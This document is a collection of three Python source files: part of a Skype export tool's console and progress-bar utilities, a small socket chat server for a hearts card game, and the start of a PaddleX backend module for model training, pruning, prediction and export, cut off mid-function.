win32console.STD_OUTPUT_HANDLE)
handle.WriteConsole("\n")
ConsoleWriter.handle = handle
ConsoleWriter.realwrite = handle.WriteConsole
except Exception: # Fails if GUI program: make new console
try: win32console.FreeConsole()
except Exception: pass
try:
win32console.AllocConsole()
handle = open("CONOUT$", "w")
argv = [util.longpath(sys.argv[0])] + sys.argv[1:]
handle.write(" ".join(argv) + "\n\n")
handle.flush()
ConsoleWriter.handle = handle
ConsoleWriter.realwrite = handle.write
sys.stdin = open("CONIN$", "r")
atexit.register(self.on_exe_exit)
except Exception:
try: win32console.FreeConsole()
except Exception: pass
ConsoleWriter.realwrite = self.stream.write
ConsoleWriter.is_loaded = True
def on_exe_exit(self):
"""atexit handler for compiled binary, keeps window open for a minute."""
q = Queue.Queue()
def waiter():
raw_input()
q.put(None)
def ticker():
countdown = 60
txt = "\rClosing window in %s.. Press ENTER to exit."
while countdown > 0 and q.empty():
output(txt % countdown, end=" ")
countdown -= 1
time.sleep(1)
q.put(None)
self.write("\n\n")
for f in waiter, ticker:
t = threading.Thread(target=f)
t.daemon = True
t.start()
q.get()
class ProgressBar(threading.Thread):
"""
A simple ASCII progress bar with a ticker thread, drawn like
'[---------\ 36% ] Progressing text..'.
or for pulse mode
'[ ---- ] Progressing text..'.
"""
def __init__(self, max=100, value=0, min=0, width=30, forechar="-",
backchar=" ", foreword="", afterword="", interval=1, pulse=False):
"""
Creates a new progress bar, without drawing it yet.
@param max progress bar maximum value, 100%
@param value progress bar initial value
@param min progress bar minimum value, for 0%
@param width progress bar width (in characters)
@param forechar character used for filling the progress bar
@param backchar character used for filling the background
@param foreword text in front of progress bar
@param afterword text after progress bar
@param interval ticker thread interval, in seconds
@param pulse ignore value-min-max, use constant pulse instead
"""
threading.Thread.__init__(self)
for k, v in locals().items(): setattr(self, k, v) if "self" != k else 0
self.daemon = True # Daemon threads do not keep application running
self.percent = None # Current progress ratio in per cent
self.value = None # Current progress bar value
self.pause = False # Whether drawing is currently paused
self.pulse_pos = 0 # Current pulse position
self.bar = "%s[%s%s]%s" % (foreword,
backchar if pulse else forechar,
backchar * (width - 3),
afterword)
self.printbar = self.bar # Printable text, with padding to clear previous
self.progresschar = itertools.cycle("-\\|/")
self.is_running = False
if not pulse: self.update(value, draw=False)
def update(self, value=None, draw=True):
"""Updates the progress bar value, and refreshes by default."""
if value is not None: self.value = min(self.max, max(self.min, value))
w_full = self.width - 2
if self.pulse:
if self.pulse_pos is None:
bartext = "%s[%s]%s" % (self.foreword,
self.forechar * (self.width - 2),
self.afterword)
else:
dash = self.forechar * max(1, (self.width - 2) / 7)
pos = self.pulse_pos
if pos < len(dash):
dash = dash[:pos]
elif pos >= self.width - 1:
dash = dash[:-(pos - self.width - 2)]
bar = "[%s]" % (self.backchar * w_full)
# Write pulse dash into the middle of the bar
pos1 = min(self.width - 1, pos + 1)
bar = bar[:pos1 - len(dash)] + dash + bar[pos1:]
bartext = "%s%s%s" % (self.foreword, bar, self.afterword)
self.pulse_pos = (self.pulse_pos + 1) % (self.width + 2)
else:
new_percent = int(round(100.0 * self.value / (self.max or 1)))
w_done = max(1, int(round((new_percent / 100.0) * w_full)))
# Build bar outline, animate by cycling last char from progress chars
char_last = self.forechar
if draw and w_done < w_full: char_last = next(self.progresschar)
bartext = "%s[%s%s%s]%s" % (
self.foreword, self.forechar * (w_done - 1), char_last,
self.backchar * (w_full - w_done), self.afterword)
# Write percentage into the middle of the bar
centertxt = " %2d%% " % new_percent
pos = len(self.foreword) + self.width / 2 - len(centertxt) / 2
bartext = bartext[:pos] + centertxt + bartext[pos + len(centertxt):]
self.percent = new_percent
self.printbar = bartext + " " * max(0, len(self.bar) - len(bartext))
self.bar = bartext
if draw: self.draw()
def draw(self):
"""Prints the progress bar, from the beginning of the current line."""
output("\r" + self.printbar, end=" ")
def run(self):
self.is_running = True
while self.is_running:
if not self.pause: self.update(self.value)
time.sleep(self.interval)
def stop(self):
self.is_running = False
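# A minimal ProgressBar usage sketch (illustrative only; mirrors how run_export
# above drives the class, with `total` as a placeholder item count):
#
#   bar = ProgressBar(max=total, afterword=" Exporting..")
#   bar.start()              # ticker thread begins periodic redraws
#   for i in range(total):
#       bar.update(i + 1)    # advance the bar and redraw immediately
#   bar.stop()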
def win32_unicode_argv():
# @from http://stackoverflow.com/a/846931/145400
result = sys.argv
from ctypes import POINTER, byref, cdll, c_int, windll
from ctypes.wintypes import LPCWSTR, LPWSTR
GetCommandLineW = cdll.kernel32.GetCommandLineW
GetCommandLineW.argtypes = []
GetCommandLineW.restype = LPCWSTR
CommandLineToArgvW = windll.shell32.CommandLineToArgvW
CommandLineToArgvW.argtypes = [LPCWSTR, POINTER(c_int)]
CommandLineToArgvW.restype = POINTER(LPWSTR)
argc = c_int(0)
argv = CommandLineToArgvW(GetCommandLineW(), byref(argc))
if argc.value:
# Remove Python executable and commands if present
start = argc.value - len(sys.argv)
result = [argv[i].encode("utf-8") for i in range(start, argc.value)]
return result
def get_password(username):
"""Asks user for password from keyboard input."""
result, prompt = "", "Enter Skype password for '%s': " % username
with warnings.catch_warnings():
warnings.simplefilter("ignore") # possible GetPassWarning
while not result:
output(prompt, end="") # getpass output can raise errors
result = getpass.getpass("", io.BytesIO()).strip()
return result
def output(s="", **kwargs):
"""Print wrapper, avoids "Broken pipe" errors if piping is interrupted."""
try: print(s, **kwargs)
except UnicodeError:
try:
if isinstance(s, str): print(s.decode(errors="replace"), **kwargs)
except Exception: pass
try:
sys.stdout.flush() # Uncatchable error otherwise if interrupted
except IOError as e:
if e.errno in (errno.EINVAL, errno.EPIPE):
sys.exit() # Stop work in progress if sys.stdout or pipe closed
raise # Propagate any other errors
if "__main__" == __name__:
try: run()
except KeyboardInterrupt: sys.exit()
|
server.py
|
import socket
import time
import threading
from player import Player
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # prevents address being unavailable when restarting server
host = "" # means can run anywhere basically
port = 3033
players = []
accepted_colours = ['aquamarine', 'blue', 'coral', 'cyan', 'gold', 'goldenrod', 'khaki', 'maroon',
'navy', 'orange', 'pink', 'purple', 'red', 'salmon', 'thistle', 'tomato', 'turquoise']
try:
s.bind((host, port))
s.listen(5)
print("Waiting for a connection on port {}".format(port))
def handle_command_from_player(message, player):
# slash has already been removed
args = message.split(" ")
if len(args) == 0: return
type = args[0]
if type == "name" and len(args) > 1:
original_name = player.name
desired_name = " ".join(message.split(" ")[1:])
if 0 < len(desired_name) <= 16:
player.name = desired_name
print("{} changed their username to {}".format(original_name, player.name))
connected = connected_players()
player.tell("You have set your username to {}\nCurrently connected ({}): {}".format(
player.name, len(players), connected))
broadcast_except_player("{} set their username to {}\nCurrently connected ({}): {}".format(
original_name, player.name, len(players), connected), player)
else:
print("{} wants (too long) username {}".format(original_name, desired_name))
elif type == "colour":
if len(args) > 1:
colour = args[1].lower()
if not colour: return
if colour in accepted_colours:
player.colour = colour
print("{} set their colour to {}".format(player.name, player.colour))
player.tell("You have set your colour to {}".format(colour), c=colour)
broadcast_except_player("{} set their colour to {}".format(player.name, player.colour), player)
elif "#" in colour:
print("{} wants to use hex code {} as their colour".format(player.name, colour))
player.tell("Sorry, hex codes are not supported!", c="red")
# todo support hex codes
else:
print("{} wants unsupported colour {}".format(player.name, colour))
player.tell("{} is not a recognised colour name".format(colour), c="red")
# todo ", try using hex codes instead"
else:
player.tell("You must enter a colour to use that command!")
elif type == "colours":
colour_strings = ["/colour {0} \t{0}".format(c) for c in accepted_colours]
player.tell("Colours:")
for cs in colour_strings: player.tell(cs)
elif type == "hand":
player.tell("/colour red This command is not ready yet")
elif type == "help":
player.tell(
"\nAvailable commands:" +
"\n /name [new name] - change your name" +
"\n /colour [new colour] - change your text colour" +
"\n /colours - list available colours" +
"\n /hand - show your current hand" +
"\n /help - see this message" +
"\n /exit - disconnect and close the application" +
"\n")
else:
print("{} attempted unrecognised command {}".format(player.name, message))
player.tell("You have attempted an unrecognised command: {}".format(message))
def get_next_message(p):
        end_of_transmission = chr(23)  # ASCII ETB (0x17), used here as the message delimiter
with p.buffer_lock:
decoded = p.receive_buffer.decode("utf-8")
while p.keep_alive:
while end_of_transmission not in decoded:
time.sleep(0.1)
with p.buffer_lock:
decoded = p.receive_buffer.decode("utf-8")
# no full transmission yet, loop to check again
# now something new to check
if end_of_transmission in decoded: # double check to avoid failures
first_cut_off = decoded.index(end_of_transmission)
to_parse = decoded[:first_cut_off] # excluding EOT char
with p.buffer_lock:
p.receive_buffer = decoded[first_cut_off + 1:].encode() # excluding EOT char
return to_parse
else:
return "Error: EOT not found in get_next_message after loop break"
def receive_loop(p):
while p.keep_alive:
try:
data = p.conn.recv(4096)
if not data: # player disconnected if blocking call returns empty byte string
# print("{} disconnected from server".format(p.name))
p.keep_alive = False
with p.buffer_lock:
p.receive_buffer += data
except socket.error as ex:
p.keep_alive = False
print("Socket error {}".format(str(ex)))
def client_handler_main(player):
player.receive_buffer = b""
player.keep_alive = True
player.buffer_lock = threading.Lock()
rec_thread = threading.Thread(target=receive_loop, args=(player,))
rec_thread.setDaemon(True)
rec_thread.start()
# below is parse loop
player.tell("You have successfully connected to py-hearts!\n/help - for information on the commands")
while player.keep_alive:
try:
if not player.conn: break # player disconnect? probably not the way to check it
message = get_next_message(player)
if not message: continue
if message == "/exit": player.keep_alive = False; break # player definitely disconnected
if message.startswith("/"):
# command other than exit
handle_command_from_player(message[1:], player)
else:
print(player.name + ": " + message)
broadcast_except_player(player.name + ": " + message, player)
except Exception as ex:
print("Error in {}'s thread".format(player.name))
# maybe break here?
raise
player.conn.close()
try:
players.remove(player)
        except ValueError:  # player was already removed
pass
print("{} disconnected from server".format(player.name))
broadcast("{} disconnected from server".format(player.name))
def broadcast(message):
failed = []
for player in players:
if not player.tell(message):
failed.append(player)
for p in failed:
p.keep_alive = False
try:
players.remove(p)
            except ValueError:  # player was already removed
pass
for p in failed: broadcast("{} disconnected".format(p.name))
def broadcast_except_player(message, not_this_player):
failed = []
for player in players:
if player != not_this_player:
if not player.tell(message, not_this_player.colour):
failed.append(player)
for p in failed:
p.keep_alive = False
try:
players.remove(p)
            except ValueError:  # player was already removed
pass
for p in failed: broadcast("{} disconnected".format(p.name))
def connected_players(): return ', '.join([p.name for p in players])
while True:
try:
conn, addr = s.accept()
name = "anonymous_new_user"
print("{} connected from {}:{}".format(name, addr[0], addr[1]))
broadcast("{} has joined".format(name))
p = Player(name, conn)
players.append(p)
cli_thread = threading.Thread(target=client_handler_main, args=(p,))
cli_thread.setDaemon(True)
cli_thread.start()
except KeyboardInterrupt as user_cancelled:
print("\rExiting...")
break
except:
raise
except socket.error as ex:
print(str(ex))
s.close()
|
operate.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path as osp
import os
import numpy as np
from PIL import Image
import sys
import cv2
import psutil
import shutil
import pickle
import base64
import multiprocessing as mp
from ..utils import (pkill, set_folder_status, get_folder_status, TaskStatus,
PredictStatus, PruneStatus)
from .evaluate.draw_pred_result import visualize_classified_result, visualize_detected_result, visualize_segmented_result
from .visualize import plot_det_label, plot_insseg_label, get_color_map_list
from paddlex_restful.restful.dataset.utils import get_encoding
def _call_paddle_prune(best_model_path, prune_analysis_path, params):
mode = 'w'
sys.stdout = open(
osp.join(prune_analysis_path, 'out.log'), mode, encoding='utf-8')
sys.stderr = open(
osp.join(prune_analysis_path, 'err.log'), mode, encoding='utf-8')
task_type = params['task_type']
dataset_path = params['dataset_path']
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
if task_type == "classification":
from .prune.classification import prune
elif task_type in ["detection", "instance_segmentation"]:
from .prune.detection import prune
elif task_type == "segmentation":
from .prune.segmentation import prune
batch_size = params['train'].batch_size
prune(best_model_path, dataset_path, prune_analysis_path, batch_size)
set_folder_status(prune_analysis_path, PruneStatus.XSPRUNEDONE)
def _call_paddlex_train(task_path, params):
'''
Args:
        params is a dict whose fields include 'pretrain_weights_download_save_dir':
        the directory for saving pretrained weights, 'task_type': the task type,
        'dataset_path': the dataset path, and 'train': the training parameters
'''
mode = 'w'
if params['train'].resume_checkpoint is not None:
params['train'].pretrain_weights = None
mode = 'a'
sys.stdout = open(osp.join(task_path, 'out.log'), mode, encoding='utf-8')
sys.stderr = open(osp.join(task_path, 'err.log'), mode, encoding='utf-8')
sys.stdout.write("This log file path is {}\n".format(
osp.join(task_path, 'out.log')))
sys.stdout.write("注意:标志为WARNING/INFO类的仅为警告或提示类信息,非错误信息\n")
sys.stderr.write("This log file path is {}\n".format(
osp.join(task_path, 'err.log')))
sys.stderr.write("注意:标志为WARNING/INFO类的仅为警告或提示类信息,非错误信息\n")
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
import paddlex as pdx
pdx.gui_mode = True
pdx.log_level = 3
pdx.pretrain_dir = params['pretrain_weights_download_save_dir']
task_type = params['task_type']
dataset_path = params['dataset_path']
if task_type == "classification":
from .train.classification import train
elif task_type in ["detection", "instance_segmentation"]:
from .train.detection import train
elif task_type == "segmentation":
from .train.segmentation import train
train(task_path, dataset_path, params['train'])
set_folder_status(task_path, TaskStatus.XTRAINDONE)
def _call_paddlex_evaluate_model(task_path,
model_path,
task_type,
epoch,
topk=5,
score_thresh=0.3,
overlap_thresh=0.5):
evaluate_status_path = osp.join(task_path, 'logs/evaluate')
sys.stdout = open(
osp.join(evaluate_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(evaluate_status_path, 'err.log'), 'w', encoding='utf-8')
if task_type == "classification":
from .evaluate.classification import Evaluator
evaluator = Evaluator(model_path, topk=topk)
elif task_type == "detection":
from .evaluate.detection import DetEvaluator
evaluator = DetEvaluator(
model_path,
score_threshold=score_thresh,
overlap_thresh=overlap_thresh)
elif task_type == "instance_segmentation":
from .evaluate.detection import InsSegEvaluator
evaluator = InsSegEvaluator(
model_path,
score_threshold=score_thresh,
overlap_thresh=overlap_thresh)
elif task_type == "segmentation":
from .evaluate.segmentation import Evaluator
evaluator = Evaluator(model_path)
report = evaluator.generate_report()
report['epoch'] = epoch
pickle.dump(report, open(osp.join(task_path, "eval_res.pkl"), "wb"))
set_folder_status(evaluate_status_path, TaskStatus.XEVALUATED)
set_folder_status(task_path, TaskStatus.XEVALUATED)
def _call_paddlex_predict(task_path,
predict_status_path,
params,
img_list,
img_data,
save_dir,
score_thresh,
epoch=None):
total_num = open(
osp.join(predict_status_path, 'total_num'), 'w', encoding='utf-8')
def write_file_num(total_file_num):
total_num.write(str(total_file_num))
total_num.close()
sys.stdout = open(
osp.join(predict_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(predict_status_path, 'err.log'), 'w', encoding='utf-8')
import paddlex as pdx
pdx.log_level = 3
task_type = params['task_type']
dataset_path = params['dataset_path']
if epoch is None:
model_path = osp.join(task_path, 'output', 'best_model')
else:
model_path = osp.join(task_path, 'output', 'epoch_{}'.format(epoch))
model = pdx.load_model(model_path)
file_list = dict()
predicted_num = 0
if task_type == "classification":
if img_data is None:
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(osp.join(dataset_path, "test_list.txt")) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = items[1]
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
for image, label_id in file_list.items():
pred_result = {}
if label_id is not None:
pred_result["gt_label"] = model.labels[int(label_id)]
results = model.predict(img_file=image)
pred_result["label"] = []
pred_result["score"] = []
pred_result["topk"] = len(results)
for res in results:
pred_result["label"].append(res['category'])
pred_result["score"].append(res['score'])
visualize_classified_result(save_dir, image, pred_result)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR)
results = model.predict(img)
pred_result = {}
pred_result["label"] = []
pred_result["score"] = []
pred_result["topk"] = len(results)
for res in results:
pred_result["label"].append(res['category'])
pred_result["score"].append(res['score'])
visualize_classified_result(save_dir, img, pred_result)
elif task_type in ["detection", "instance_segmentation"]:
if img_data is None:
if task_type == "detection" and osp.exists(
osp.join(dataset_path, "test_list.txt")):
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(
osp.join(dataset_path, "test_list.txt"),
encoding=get_encoding(
osp.join(dataset_path, "test_list.txt"))) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = \
osp.join(dataset_path, items[1])
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
for image, anno in file_list.items():
results = model.predict(img_file=image)
image_pred = pdx.det.visualize(
image, results, threshold=score_thresh, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
image_gt = None
if anno is not None:
image_gt = plot_det_label(image, anno, model.labels)
visualize_detected_result(save_name, image_gt, image_pred)
predicted_num += 1
elif len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test.json")):
from pycocotools.coco import COCO
anno_path = osp.join(dataset_path, "test.json")
coco = COCO(anno_path)
img_ids = coco.getImgIds()
total_file_num = len(img_ids)
write_file_num(total_file_num)
for img_id in img_ids:
img_anno = coco.loadImgs(img_id)[0]
file_name = img_anno['file_name']
name = (osp.split(file_name)[-1]).split(".")[0]
anno = osp.join(dataset_path, "Annotations", name + ".npy")
img_file = osp.join(dataset_path, "JPEGImages", file_name)
results = model.predict(img_file=img_file)
image_pred = pdx.det.visualize(
img_file,
results,
threshold=score_thresh,
save_dir=None)
save_name = osp.join(save_dir, osp.split(img_file)[-1])
if task_type == "detection":
image_gt = plot_det_label(img_file, anno, model.labels)
else:
image_gt = plot_insseg_label(img_file, anno,
model.labels)
visualize_detected_result(save_name, image_gt, image_pred)
predicted_num += 1
else:
total_file_num = len(img_list)
write_file_num(total_file_num)
for image in img_list:
results = model.predict(img_file=image)
image_pred = pdx.det.visualize(
image, results, threshold=score_thresh, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
visualize_detected_result(save_name, None, image_pred)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR)
results = model.predict(img)
image_pred = pdx.det.visualize(
img, results, threshold=score_thresh, save_dir=None)
image_gt = None
save_name = osp.join(save_dir, 'predict_result.png')
visualize_detected_result(save_name, image_gt, image_pred)
elif task_type == "segmentation":
if img_data is None:
if len(img_list) == 0 and osp.exists(
osp.join(dataset_path, "test_list.txt")):
with open(
osp.join(dataset_path, "test_list.txt"),
encoding=get_encoding(
osp.join(dataset_path, "test_list.txt"))) as f:
for line in f:
items = line.strip().split()
file_list[osp.join(dataset_path, items[0])] = \
osp.join(dataset_path, items[1])
else:
for image in img_list:
file_list[image] = None
total_file_num = len(file_list)
write_file_num(total_file_num)
color_map = get_color_map_list(256)
legend = {}
for i in range(len(model.labels)):
legend[model.labels[i]] = color_map[i]
for image, anno in file_list.items():
results = model.predict(img_file=image)
image_pred = pdx.seg.visualize(image, results, save_dir=None)
pse_pred = pdx.seg.visualize(
image, results, weight=0, save_dir=None)
image_ground = None
pse_label = None
if anno is not None:
label = np.asarray(Image.open(anno)).astype('uint8')
image_ground = pdx.seg.visualize(
image, {'label_map': label}, save_dir=None)
pse_label = pdx.seg.visualize(
image, {'label_map': label}, weight=0, save_dir=None)
save_name = osp.join(save_dir, osp.split(image)[-1])
visualize_segmented_result(save_name, image_ground, pse_label,
image_pred, pse_pred, legend)
predicted_num += 1
else:
img_data = base64.b64decode(img_data)
img_array = np.frombuffer(img_data, np.uint8)
img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR)
color_map = get_color_map_list(256)
legend = {}
for i in range(len(model.labels)):
legend[model.labels[i]] = color_map[i]
results = model.predict(img)
image_pred = pdx.seg.visualize(img, results, save_dir=None)
pse_pred = pdx.seg.visualize(img, results, weight=0, save_dir=None)
image_ground = None
pse_label = None
save_name = osp.join(save_dir, 'predict_result.png')
visualize_segmented_result(save_name, image_ground, pse_label,
image_pred, pse_pred, legend)
set_folder_status(predict_status_path, PredictStatus.XPREDONE)
def _call_paddlex_export_infer(task_path, save_dir, export_status_path, epoch):
    # Do not use the GPU when exporting the model
sys.stdout = open(
osp.join(export_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(export_status_path, 'err.log'), 'w', encoding='utf-8')
import os
os.environ['CUDA_VISIBLE_DEVICES'] = ''
os.environ['PADDLEX_EXPORT_STAGE'] = 'True'
os.environ['PADDLESEG_EXPORT_STAGE'] = 'True'
import paddlex as pdx
model_dir = "epoch_{}".format(epoch) if epoch is not None else "best_model"
model_path = osp.join(task_path, 'output', model_dir)
model = pdx.load_model(model_path)
model._export_inference_model(save_dir)
'''
model_dir = "epoch_{}".format(epoch)
model_path = osp.join(task_path, 'output', model_dir)
if os.path.exists(save_dir):
shutil.rmtree(save_dir)
shutil.copytree(model_path, save_dir)
'''
set_folder_status(export_status_path, TaskStatus.XEXPORTED)
set_folder_status(task_path, TaskStatus.XEXPORTED)
def _call_paddlex_export_quant(task_path, params, save_dir, export_status_path,
epoch):
sys.stdout = open(
osp.join(export_status_path, 'out.log'), 'w', encoding='utf-8')
sys.stderr = open(
osp.join(export_status_path, 'err.log'), 'w', encoding='utf-8')
dataset_path = params['dataset_path']
task_type = params['task_type']
os.environ['CUDA_VISIBLE_DEVICES'] = params['train'].cuda_visible_devices
import paddlex as pdx
if epoch is not None:
model_dir = "epoch_{}".format(epoch)
model_path = osp.join(task_path, 'output', model_dir)
else:
model_path = osp.join(task_path, 'output', 'best_model')
model = pdx.load_model(model_path)
if task_type == "classification":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.ImageNet(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.ImageNet(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
elif task_type == "detection":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.VOCDetection(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.VOCDetection(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
elif task_type == "instance_segmentation":
train_json = osp.join(dataset_path, 'train.json')
val_json = osp.join(dataset_path, 'val.json')
quant_dataset = pdx.datasets.CocoDetection(
data_dir=osp.join(dataset_path, 'JPEGImages'),
ann_file=train_json,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.CocoDetection(
data_dir=osp.join(dataset_path, 'JPEGImages'),
ann_file=val_json,
transforms=model.eval_transforms)
elif task_type == "segmentation":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.SegDataset(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.SegDataset(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
metric_before = model.evaluate(eval_dataset)
pdx.log_level = 3
pdx.slim.export_quant_model(
model, quant_dataset, batch_size=1, save_dir=save_dir, cache_dir=None)
model_quant = pdx.load_model(save_dir)
metric_after = model_quant.evaluate(eval_dataset)
metrics = {}
if task_type == "segmentation":
metrics['before'] = {'miou': metric_before['miou']}
metrics['after'] = {'miou': metric_after['miou']}
else:
metrics['before'] = metric_before
metrics['after'] = metric_after
import json
with open(
osp.join(export_status_path, 'quant_result.json'),
'w',
encoding='utf-8') as f:
json.dump(metrics, f)
set_folder_status(export_status_path, TaskStatus.XEXPORTED)
set_folder_status(task_path, TaskStatus.XEXPORTED)
def _call_paddlelite_export_lite(model_path, save_dir=None, place="arm"):
import paddlelite.lite as lite
opt = lite.Opt()
model_file = os.path.join(model_path, '__model__')
params_file = os.path.join(model_path, '__params__')
if save_dir is None:
save_dir = osp.join(model_path, "lite_model")
if not osp.exists(save_dir):
os.makedirs(save_dir)
path = osp.join(save_dir, "model")
opt.run_optimize("", model_file, params_file, "naive_buffer", place, path)
def safe_clean_folder(folder):
if osp.exists(folder):
try:
shutil.rmtree(folder)
os.makedirs(folder)
except Exception as e:
pass
if osp.exists(folder):
for root, dirs, files in os.walk(folder):
for name in files:
try:
os.remove(os.path.join(root, name))
except Exception as e:
pass
else:
os.makedirs(folder)
else:
os.makedirs(folder)
if not osp.exists(folder):
os.makedirs(folder)
def get_task_max_saved_epochs(task_path):
saved_epoch_num = -1
output_path = osp.join(task_path, "output")
if osp.exists(output_path):
for f in os.listdir(output_path):
if f.startswith("epoch_"):
if not osp.exists(osp.join(output_path, f, '.success')):
continue
curr_epoch_num = int(f[6:])
if curr_epoch_num > saved_epoch_num:
saved_epoch_num = curr_epoch_num
return saved_epoch_num
def get_task_status(task_path):
status, message = get_folder_status(task_path, True)
task_id = os.path.split(task_path)[-1]
err_log = os.path.join(task_path, 'err.log')
if status in [TaskStatus.XTRAINING, TaskStatus.XPRUNETRAIN]:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XTRAINFAIL
message = "训练任务{}异常终止,请查阅错误日志具体确认原因{}。\n\n 如若通过日志无法确定原因,可尝试以下几种方法,\n" \
"1. 尝试重新启动训练,看是否能正常训练; \n" \
"2. 调低batch_size(需同时按比例调低学习率等参数)排除是否是显存或内存不足的原因导致;\n" \
"3. 前往GitHub提ISSUE,描述清楚问题会有工程师及时回复: https://github.com/PaddlePaddle/PaddleX/issues ; \n" \
"3. 加QQ群1045148026或邮件至paddlex@baidu.com在线咨询工程师".format(task_id, err_log)
set_folder_status(task_path, status, message)
return status, message
def train_model(task_path):
"""训练模型
Args:
task_path(str): 模型训练的参数保存在task_path下的'params.pkl'文件中
"""
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
sensitivities_path = params['train'].sensitivities_path
p = mp.Process(target=_call_paddlex_train, args=(task_path, params))
p.start()
if sensitivities_path is None:
set_folder_status(task_path, TaskStatus.XTRAINING, p.pid)
else:
set_folder_status(task_path, TaskStatus.XPRUNETRAIN, p.pid)
return p
def stop_train_model(task_path):
"""停止正在训练的模型
Args:
task_path(str): 从task_path下的'XTRANING'文件中获取训练的进程id
"""
status, message = get_task_status(task_path)
if status in [TaskStatus.XTRAINING, TaskStatus.XPRUNETRAIN]:
pid = int(message)
pkill(pid)
best_model_saved = True
if not osp.exists(osp.join(task_path, 'output', 'best_model')):
best_model_saved = False
set_folder_status(task_path, TaskStatus.XTRAINEXIT, best_model_saved)
else:
raise Exception("模型训练任务没在运行中")
def prune_analysis_model(task_path):
"""模型裁剪分析
Args:
task_path(str): 模型训练的参数保存在task_path
dataset_path(str) 模型裁剪中评估数据集的路径
"""
best_model_path = osp.join(task_path, 'output', 'best_model')
assert osp.exists(best_model_path), "该任务暂未保存模型,无法进行模型裁剪分析"
prune_analysis_path = osp.join(task_path, 'prune')
if not osp.exists(prune_analysis_path):
os.makedirs(prune_analysis_path)
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
assert params['train'].model.lower() not in [
"fasterrcnn", "maskrcnn"
], "暂不支持FasterRCNN、MaskRCNN模型裁剪"
p = mp.Process(
target=_call_paddle_prune,
args=(best_model_path, prune_analysis_path, params))
p.start()
set_folder_status(prune_analysis_path, PruneStatus.XSPRUNEING, p.pid)
set_folder_status(task_path, TaskStatus.XPRUNEING, p.pid)
return p
def get_prune_status(prune_path):
status, message = get_folder_status(prune_path, True)
if status in [PruneStatus.XSPRUNEING]:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PruneStatus.XSPRUNEFAIL
message = "模型裁剪异常终止,可能原因如下:\n1.暂不支持FasterRCNN、MaskRCNN模型的模型裁剪\n2.模型裁剪过程中进程被异常结束,建议重新启动模型裁剪任务"
set_folder_status(prune_path, status, message)
return status, message
def stop_prune_analysis(prune_path):
"""停止正在裁剪分析的模型
Args:
prune_path(str): prune_path'XSSLMING'文件中获取训练的进程id
"""
status, message = get_prune_status(prune_path)
if status == PruneStatus.XSPRUNEING:
pid = int(message)
pkill(pid)
set_folder_status(prune_path, PruneStatus.XSPRUNEEXIT)
else:
raise Exception("模型裁剪分析任务未在运行中")
def evaluate_model(task_path,
task_type,
epoch=None,
topk=5,
score_thresh=0.3,
overlap_thresh=0.5):
"""评估最优模型
Args:
